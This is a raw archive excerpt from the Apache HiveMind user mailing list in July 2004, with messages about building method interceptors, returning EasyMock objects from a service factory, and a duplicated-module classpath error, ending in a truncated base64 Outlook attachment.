</blockquote> <pre wrap=""><!----> --------------------------------------------------------------------- To unsubscribe, e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> For additional commands, e-mail: <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> </pre> </blockquote> <br> </body> </html> --------------080407080700020001000401-- From [email protected] Sat Jul 17 00:25:15 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61561 invoked from network); 17 Jul 2004 00:25:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Jul 2004 00:25:15 -0000 Received: (qmail 3815 invoked by uid 500); 17 Jul 2004 00:25:14 -0000 Delivered-To: [email protected] Received: (qmail 3792 invoked by uid 500); 17 Jul 2004 00:25:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3778 invoked by uid 99); 17 Jul 2004 00:25:14 -0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=HTML_40_50,HTML_MESSAGE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO server.unitdev.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Fri, 16 Jul 2004 17:25:11 -0700 Received: from unit02 (w068.z064002059.sjc-ca.dsl.cnc.net [161.129.204.104]) by server.unitdev.com (8.12.10/8.12.10) with ESMTP id i6H1Lru7017742 for <[email protected]>; Fri, 16 Jul 2004 18:21:53 -0700 Message-Id: <[email protected]> From: "Drew McAuliffe" <[email protected]> To: <[email protected]> Subject: Interceptor help Date: Fri, 16 Jul 2004 17:25:07 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_017F_01C46B59.D725DA20" X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409 Thread-Index: AcRrlINZC/JJxiyYQ0u7k/5PvGmfcQ== X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------=_NextPart_000_017F_01C46B59.D725DA20 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit I'm having a bear of a time trying to get a handle on how to create interceptors. I've worked with the interceptors in xwork/webwork, which I understand are very different, though I'm assuming some of the core ideas are the same: you're trying to wrap functionality around a given method call. I have what I believe is a relatively simple use case, but I just can't grok the Javassist stuff going on in the sample interceptors. Here's what I'm trying to do, if anyone can help with a simple example of a portion of it to set me on my way. I have a service interface, IJournalService, that acts as a DAO-type object for an interface called IJournal. It has the following simple methods: public IJournal add(IJournal toAdd, IUserInfo ui); public IJournal load(Long id, IUserInfo ui); public IJournal save(IJournal updated, IJournal original, IUserInfo ui); etc. What I want is to make it easy to add interception to this interface by any other module that uses the module in which this is defined. There are a couple of things I want to expose: 1) A base class that will allow an implementation class to implement methods like public void beforeAdd(IJournal toAdd, IUserInfo ui); public void afterAdd(IJournal toAdd, IUserInfo ui); public void beforeSave(IJournal updated, IJournal original, IUserInfo ui); etc. This gives me the ability to stick additional functionality into the data access chain that can't normally be implemented directly in the IJournal implementation itself. For example, I may need to reevaluate a set of configured alerts based on a change to the journal item, but can't do that by detecting changes in the object itself. The "save" method chain is a logical place for that kind of functionality. The idea is to make it configurable so that different modules can drop in their own interceptors as necessary without having to put the functionality in the base object. 2) I'd also like to be able to have other modules drop in interceptors for things like transaction processing or event publishing. It would be ideal to have those implemented as interceptors so that they would become completely optional features for a module that was using this module (or, in the case of transaction processing, the interceptor used would dictate the kind of transactionality implemented). Any ideas on how to help, or am I looking at the way hivemind does interception in the wrong way? ------=_NextPart_000_017F_01C46B59.D725DA20 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <META content=3D"MSHTML 6.00.2800.1400" name=3DGENERATOR></HEAD> <BODY> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>I'm = having a bear of=20 a time trying to get a handle on how to create interceptors. I've worked = with=20 the interceptors in xwork/webwork, which I understand are very = different, though=20 I'm assuming some of the core ideas are the same: you're trying to wrap=20 functionality around a given method call. I have what I believe is a = relatively=20 simple use case, but I just can't grok the Javassist stuff going on in = the=20 sample interceptors.</FONT></SPAN></DIV><SPAN = class=3D843290500-17072004> <DIV><BR><FONT face=3DArial size=3D2>Here's what I'm trying to do, if = anyone can=20 help with a simple example of a portion of it to set me on my = way.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>I have = a service=20 interface, IJournalService, that acts as a DAO-type object for an = interface=20 called IJournal. It has the following simple = methods:</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>public = IJournal=20 add(IJournal toAdd, IUserInfo ui);</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>public = IJournal=20 load(Long id, IUserInfo ui);</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>public = IJournal=20 save(IJournal updated, IJournal original, IUserInfo = ui);</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial=20 size=3D2>etc.</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial=20 size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>What I = want is to=20 make it easy to add interception to this interface by any other module = that uses=20 the module in which this is defined. There are a couple of things I want = to=20 expose:</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>1) A = base class that=20 will allow an implementation class to implement methods like=20 </FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004>&nbsp;&nbsp;&nbsp; <FONT = face=3DArial=20 size=3D2>public void beforeAdd(IJournal toAdd, IUserInfo = ui);</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004>&nbsp;&nbsp;&nbsp; <FONT = face=3DArial=20 size=3D2>public void afterAdd(IJournal toAdd, IUserInfo = ui);</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004>&nbsp;&nbsp;&nbsp; <FONT = face=3DArial=20 size=3D2>public void beforeSave(IJournal updated, IJournal original, = IUserInfo=20 ui);</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial=20 size=3D2>etc.</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>This = gives me the=20 ability to stick additional functionality into the data access chain = that can't=20 normally be implemented directly in the IJournal implementation itself. = For=20 example, I may need to reevaluate a set of configured alerts based on a = change=20 to the journal item, but can't do that by detecting changes in the = object=20 itself. The "save" method chain is a logical place for that kind of=20 functionality. The idea is to make it configurable so that different = modules can=20 drop in their own interceptors as necessary without having to put the=20 functionality in the base object.</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial=20 size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>2) I'd = also like to=20 be able to have other modules drop in interceptors for things like = transaction=20 processing or event publishing. It would be ideal to have those = implemented as=20 interceptors so that they would become completely optional features for = a module=20 that was using this module (or, in the case of transaction processing, = the=20 interceptor used would dictate the kind of transactionality=20 implemented).</FONT></SPAN></DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial=20 size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D843290500-17072004><FONT face=3DArial size=3D2>Any = ideas on how to=20 help, or am I looking at the way hivemind does interception in the wrong = way?</FONT></SPAN></SPAN></DIV></BODY></HTML> ------=_NextPart_000_017F_01C46B59.D725DA20-- From [email protected] Mon Jul 19 21:37:02 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26094 invoked from network); 19 Jul 2004 21:37:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Jul 2004 21:37:02 -0000 Received: (qmail 36662 invoked by uid 500); 19 Jul 2004 21:37:01 -0000 Delivered-To: [email protected] Received: (qmail 36636 invoked by uid 500); 19 Jul 2004 21:37:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36607 invoked by uid 99); 19 Jul 2004 21:37:01 -0000 X-ASF-Spam-Status: No, hits=1.6 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS,MAILTO_TO_SPAM_ADDR X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO rwcrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Mon, 19 Jul 2004 14:36:58 -0700 Received: from almightybeast (h0010b50ed00a.ne.client2.attbi.com[161.129.204.104]) by comcast.net (rwcrmhc13) with SMTP id <20040719213657015003dutoe>; Mon, 19 Jul 2004 21:36:57 +0000 From: "Howard M. Lewis Ship" <[email protected]> To: <[email protected]>, <[email protected]> Subject: RE: Stuck w/hivemind, please help :-) Date: Mon, 19 Jul 2004 17:36:46 -0400 Message-ID: <018101c46dd8$7e989970$6501a8c0@ALMIGHTYBEAST> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N HiveMind CVS should be passing all unit tests. I don't check in unless it does. Not sure what you are trying to create; sounds to me like you want a ServiceImplementationFactory that uses EasyMock to create the service implementation? That's really easy: create a service that implements ServiceImplementationFactory, i.e. public class MockServiceFactory implements ServiceImplementationFactory { public Object createCoreServiceImplementation( String serviceId, Class serviceInterface, Module invokingModule, List parameters) { MockControl control = MockControl.createStrictControl(serviceInterace); control.replay(); return control.getMock(); } } That'll return a service implementation that will throw an exception if you invoke any methods on it. You can then use invoke-factory on this service, instead of hivemind.BuilderFactory. Sweet! hivemind.lib includes a factory that creates an empty/default implementation that does nothing ... all the methods just return void, 0 or false. -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com > -----Original Message----- > From: [email protected] [mailto:[email protected]] > Sent: Monday, July 19, 2004 5:13 PM > To: [email protected] > Subject: Stuck w/hivemind, please help :-) > > > Hi Howard, > > > just talked my project into using Hivemind and now I have to eat my > words... > > > We're in the starting phase, all we have is interfaces. To > get started, > we want Hivemind to return an Easymock object. I guess, I need an > object provider? The docs are thin, the mailing list doesn't have an > archive... pretty please? > > so, maybe like this? > > module (id=foo version="0.0.1") > { > service-point (id=Repository interface=foo.repository.Repository) > > provider > (prefix=service-property:testing.foo.MockService:getRepository) > > > service-point (id=MockService > interface=testing.plaengine.MockService) { > create-instance (class=test.plaengine.MockServiceImpl) > } > > } > > public interface MockService { > > foo.repository.Repository getRepository(); // impl > creates an easymock > instance > } > > Well, hivemind-1.0-beta-1 doesn't like the colons, > hivemind-cvs doesn't > pass the unit tests... > > > Many thanks in advance, > > )-(agen > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 01:16:51 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13106 invoked from network); 20 Jul 2004 01:16:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 01:16:51 -0000 Received: (qmail 1951 invoked by uid 500); 20 Jul 2004 01:16:51 -0000 Delivered-To: [email protected] Received: (qmail 1930 invoked by uid 500); 20 Jul 2004 01:16:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1916 invoked by uid 99); 20 Jul 2004 01:16:51 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Mon, 19 Jul 2004 18:16:48 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Mon, 19 Jul 2004 18:16:26 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <38K35PRR>; Mon, 19 Jul 2004 21:16:43 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 38K35PR3; Mon, 19 Jul 2004 21:16:42 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364C96ZP>; Mon, 19 Jul 2004 21:17:51 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: Funny error message Date: Mon, 19 Jul 2004 21:16:00 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CE2ADE31SO1939550-01-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I'm getting the following error message which I find strange because it refers to the same file. Error: Module com.mckesson.lab.wo is duplicated! Definition in file:/C:/dev900/java/hlwoweb/webapp/WEB-INF/classes/META-INF/hivemodule.sdl has been ignored in favor of existing definition from file:/C:/dev900/java/hlwoweb/webapp/WEB-INF/classes/META-INF/hivemodule.sdl. Any ideas as to what could be causing this? Could this be a classloader error running inside of Eclipse? Richard --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 01:49:20 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34956 invoked from network); 20 Jul 2004 01:49:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 01:49:20 -0000 Received: (qmail 34322 invoked by uid 500); 20 Jul 2004 01:49:20 -0000 Delivered-To: [email protected] Received: (qmail 34246 invoked by uid 500); 20 Jul 2004 01:49:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34230 invoked by uid 99); 20 Jul 2004 01:49:19 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Mon, 19 Jul 2004 18:49:16 -0700 Received: by mproxy.gmail.com with SMTP id u22so63973cwc for <[email protected]>; Mon, 19 Jul 2004 18:49:09 -0700 (PDT) Received: by 161.129.204.104 with SMTP id u43mr148325cwc; Mon, 19 Jul 2004 18:49:09 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 19 Jul 2004 21:49:09 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Funny error message In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Looks like the same file is showing up on the classpath twice? HiveMind should filter that out. On Mon, 19 Jul 2004 21:16:00 -0400, Hensley, Richard <[email protected]> wrote: > I'm getting the following error message which I find strange because it > refers to the same file. > > Error: Module com.mckesson.lab.wo is duplicated! Definition in > file:/C:/dev900/java/hlwoweb/webapp/WEB-INF/classes/META-INF/hivemodule.sdl > has been ignored in favor of existing definition from > file:/C:/dev900/java/hlwoweb/webapp/WEB-INF/classes/META-INF/hivemodule.sdl. > > Any ideas as to what could be causing this? Could this be a classloader > error running inside of Eclipse? > > Richard > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 05:11:26 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33535 invoked from network); 20 Jul 2004 05:11:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 05:11:25 -0000 Received: (qmail 44811 invoked by uid 500); 20 Jul 2004 05:11:24 -0000 Delivered-To: [email protected] Received: (qmail 44797 invoked by uid 500); 20 Jul 2004 05:11:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44784 invoked by uid 99); 20 Jul 2004 05:11:24 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO smtp10.intermedia.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Mon, 19 Jul 2004 22:11:22 -0700 Received: from ehost010-3.exch010.intermedia.net ([161.129.204.104]) by smtp10.intermedia.net with Microsoft SMTPSVC(6.0.3790.0); Mon, 19 Jul 2004 22:04:11 -0700 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----_=_NextPart_001_01C46E16.FE8B1BFB" X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Subject: AW: Funny error message Date: Mon, 19 Jul 2004 22:00:17 -0700 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: <[email protected]> Thread-Topic: Funny error message Thread-Index: AcRt+si+K8X2SOgZQ+qIZFIfa6pkDQAG6rFr From: "Stefan Liebig" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 20 Jul 2004 05:04:11.0595 (UTC) FILETIME=[FEC621B0:01C46E16] X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C46E16.FE8B1BFB Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I had the same effect. Two almost identical hivemodule file paths except = that one drive letter was in upper case and the other in lower case. =20 compeople AG Untermainanlage 8 60329 Frankfurt fon: (669)417-3652 fax: (669)417-3652 email: [email protected] home: www.compeople.de ________________________________ Von: Howard Lewis Ship [mailto:[email protected]] Gesendet: Di 20.07.2004 03:49 An: [email protected] Betreff: Re: Funny error message Looks like the same file is showing up on the classpath twice? HiveMind should filter that out. On Mon, 19 Jul 2004 21:16:00 -0400, Hensley, Richard <[email protected]> wrote: > I'm getting the following error message which I find strange because = it > refers to the same file. > > Error: Module com.mckesson.lab.wo is duplicated! Definition in > = file:/C:/dev900/java/hlwoweb/webapp/WEB-INF/classes/META-INF/hivemodule.s= dl > has been ignored in favor of existing definition from > = file:/C:/dev900/java/hlwoweb/webapp/WEB-INF/classes/META-INF/hivemodule.s= dl. > > Any ideas as to what could be causing this? Could this be a = classloader > error running inside of Eclipse? > > Richard > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C46E16.FE8B1BFB Content-Type: application/ms-tnef; name="winmail.dat" Content-Transfer-Encoding: base64 eJ8+IgwFAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAGAAAAEFXOiBGdW5ueSBlcnJvciBt ZXNzYWdlAFEIAQWAAwAOAAAA1AcHABMAFgAAABEAAQAdAQEggAMADgAAANQHBwATABYABAALAAEA GwEBCYABACEAAABDOTc4QTFBRjdENEY4MjRBQkFFN0Q1OUQwQ0VCNTNBQgCSBwEDkAYAJBIAADcA AAADADYAAAAAAEAAOQByCYZzFm7EAR4APQABAAAABQAAAEFXOiAAAAAAAgFHAAEAAAA0AAAAYz11 czthPSA7cD1vZXhjaDAxMDtsPUVIT1NUMDEwLTMtMDQwNzIwMDUwNDExWi0yNzI3AB4ASQABAAAA GAAAAFJlOiBGdW5ueSBlcnJvciBtZXNzYWdlAEAATgCA2Hu/+23EAR4AWgABAAAAEgAAAEhvd2Fy ZCBMZXdpcyBTaGlwAAAAAgFbAAEAAABAAAAAAAAAAIErH6S+oxAZnW4A3QEPVAIAAAAASG93YXJk IExld2lzIFNoaXAAU01UUABobHNoaXBAZ21haWwuY29tAAIBXAABAAAAFgAAAFNNVFA6SExTSElQ QEdNQUlMLkNPTQAAAB4AXQABAAAAEgAAAEhvd2FyZCBMZXdpcyBTaGlwAAAAAgFeAAEAAABAAAAA AAAAAIErH6S+oxAZnW4A3QEPVAIAAAAASG93YXJkIExld2lzIFNoaXAAU01UUABobHNoaXBAZ21h aWwuY29tAAIBXwABAAAAFgAAAFNNVFA6SExTSElQQEdNQUlMLkNPTQAAAB4AZgABAAAABQAAAFNN VFAAAAAAHgBnAAEAAAARAAAAaGxzaGlwQGdtYWlsLmNvbQAAAAAeAGgAAQAAAAUAAABTTVRQAAAA AB4AaQABAAAAEQAAAGhsc2hpcEBnbWFpbC5jb20AAAAAHgBwAAEAAAAUAAAARnVubnkgZXJyb3Ig bWVzc2FnZQACAXEAAQAAABsAAAABxG36yL4rxfZI6BlD6ohkUh9rqmQNAAbqsWsAHgB0AAEAAAAh AAAAaGl2ZW1pbmQtdXNlckBqYWthcnRhLmFwYWNoZS5vcmcAAAAAHgAaDAEAAAAOAAAAU3RlZmFu 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 